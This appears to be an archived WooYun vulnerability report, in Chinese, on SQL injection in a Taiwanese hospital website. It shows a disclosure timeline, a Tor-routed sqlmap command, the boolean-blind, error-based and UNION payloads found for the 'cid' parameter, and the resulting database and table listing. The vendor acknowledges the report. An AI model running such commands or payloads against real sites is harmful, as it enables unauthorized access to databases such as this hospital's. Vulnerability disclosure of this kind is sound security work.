乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
台湾某醫院SQL注入
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/doctor-m.php?articleid=2&cid1=22&cid=135&" --is-dba --dbs --current-db---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: articleid=2&cid1=22&cid=135 AND 6510=6510& Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: articleid=2&cid1=22&cid=135 AND (SELECT 1887 FROM(SELECT COUNT(*),CONCAT(0x716b787a71,(SELECT (ELT(1887=1887,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)& Type: UNION query Title: MySQL UNION query (N) - 24 columns Payload: articleid=2&cid1=22&cid=-2076 UNION ALL SELECT 'N','N','N',CONCAT(0x716b787a71,0x76715a4878444157796c,0x716a716a71),'N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N'#&---web application technology: Apacheback-end DBMS: MySQL 5.0current database: 'egh_db'current user is DBA: Falseavailable databases [2]:[*] egh_db[*] information_schemaDatabase: egh_db+----------------------------+---------+| Table | Entries |+----------------------------+---------+| web_prod2 | 222 || web_news | 197 || web_prodcategories2 | 120 || web_settings | 104 || web_prodfiles2 | 85 || web_prod | 38 || web_prod5 | 29 || web_prod3 | 22 || web_prodfiles3 | 22 |<......>
过滤
危害等级:高
漏洞Rank:16
确认时间:2015-12-18 13:29
感謝通報
暂无